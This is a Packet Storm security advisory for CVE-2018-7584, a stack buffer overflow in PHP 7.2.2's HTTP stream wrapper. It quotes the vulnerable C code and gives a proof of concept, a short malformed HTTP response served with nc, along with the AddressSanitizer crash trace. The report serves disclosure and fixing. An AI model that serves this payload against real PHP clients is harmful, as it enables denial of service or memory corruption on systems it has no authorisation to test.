what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

PHP 7.22 php_stream_url_wrap_http_ex Buffer Overflow

PHP 7.22 php_stream_url_wrap_http_ex Buffer Overflow
Posted Jun 6, 2018
Authored by Wei Lei, Liu Yang

PHP version 7.2.2 contains a memory corruption bug while parsing malformed HTTP response packets.

tags | exploit, web, overflow, php
advisories | CVE-2018-7584
SHA-256 | 667487664aa7c41c76b36c09233708ca134270a43a39a979a5c4fe652c6c0a66

PHP 7.22 php_stream_url_wrap_http_ex Buffer Overflow

Change Mirror Download
Description:
------------
The latest PHP distributions contain a memory corruption bug while parsing malformed HTTP response packets. Vulnerable code at:

php_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723

if (tmp_line[tmp_line_len - 1] == '\n') {
--tmp_line_len;
if (tmp_line[tmp_line_len - 1] == '\r') {
--tmp_line_len;
}
}

If the proceeding buffer contains '\r' as either controlled content or junk on stack, under a realistic setting (non-ASAN), tmp_line_len could go do -1, resulting in an extra large string being copied subsequently. Under ASAN a segfault can be observed.

$ bin/php --version
PHP 7.2.2 (cli) (built: Feb 20 2018 08:51:24) ( NTS )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies


Test script:
---------------
$ xxd -g 1 poc
0000000: 30 30 30 30 30 30 30 30 30 31 30 30 0a 0a 000000000100..

$ nc -vvlp 8080 < poc
Listening on [0.0.0.0] (family 0, port 8080)
Connection from [127.0.0.1] port 8080 [tcp/http-alt] accepted (family 2, sport 53083)
GET / HTTP/1.0
Host: localhost:8080
Connection: close

$ bin/php -r 'file_get_contents("http://localhost:8080");'

Expected result:
----------------
NO CRASH

Actual result:
--------------
$ bin/php -r 'file_get_contents("http://localhost:8080");'
=================================================================
==26249== ERROR: AddressSanitizer: stack-buffer-overflow on address 0xbfc038ef at pc 0x8aa393b bp 0xbfc02eb8 sp 0xbfc02eac
READ of size 1 at 0xbfc038ef thread T0
#0 0x8aa393a in php_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723
#1 0x8aa61fb in php_stream_url_wrap_http /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:979
#2 0x8b8b115 in _php_stream_open_wrapper_ex /home/weilei/php-7.2.2/main/streams/streams.c:2027
#3 0x8918dc0 in zif_file_get_contents /home/weilei/php-7.2.2/ext/standard/file.c:550
#4 0x867993a in phar_file_get_contents /home/weilei/php-7.2.2/ext/phar/func_interceptors.c:224
#5 0x91ee267 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:573
#6 0x91ee267 in execute_ex /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:59731
#7 0x923c13c in zend_execute /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:63760
#8 0x8cba975 in zend_eval_stringl /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1082
#9 0x8cbaf66 in zend_eval_stringl_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1123
#10 0x8cbb06b in zend_eval_string_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1134
#11 0x9244455 in do_cli /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1042
#12 0x9246b37 in main /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1404
#13 0xb5e8ca82 (/lib/i386-linux-gnu/libc.so.6+0x19a82)
#14 0x80656d0 in _start (/home/weilei/php7_asan/bin/php+0x80656d0)
Address 0xbfc038ef is located at offset 607 in frame <php_stream_url_wrap_http_ex> of T0's stack:
This frame has 13 object(s):
[32, 36) 'transport_string'
[96, 100) 'errstr'
[160, 164) 'http_header_line_length'
[224, 232) 'timeout'
[288, 296) 'req_buf'
[352, 360) 'tmpstr'
[416, 432) 'ssl_proxy_peer_name'
[480, 496) 'http_header'
[544, 576) 'buf'
[608, 736) 'tmp_line'
[768, 1792) 'location'
[1824, 2848) 'new_path'
[2880, 3904) 'loc_path'
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 php_stream_url_wrap_http_ex
Shadow bytes around the buggy address:
0x37f806c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x37f806d0: 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2 f2 f2 04 f4
0x37f806e0: f4 f4 f2 f2 f2 f2 04 f4 f4 f4 f2 f2 f2 f2 00 f4
0x37f806f0: f4 f4 f2 f2 f2 f2 00 f4 f4 f4 f2 f2 f2 f2 00 f4
0x37f80700: f4 f4 f2 f2 f2 f2 00 00 f4 f4 f2 f2 f2 f2 00 00
=>0x37f80710: f4 f4 f2 f2 f2 f2 00 00 00 00 f2 f2 f2[f2]00 00
0x37f80720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2
0x37f80730: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x37f80740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x37f80750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x37f80760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap righ redzone: fb
Freed Heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
ASan internal: fe
==26249== ABORTING
Aborted

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close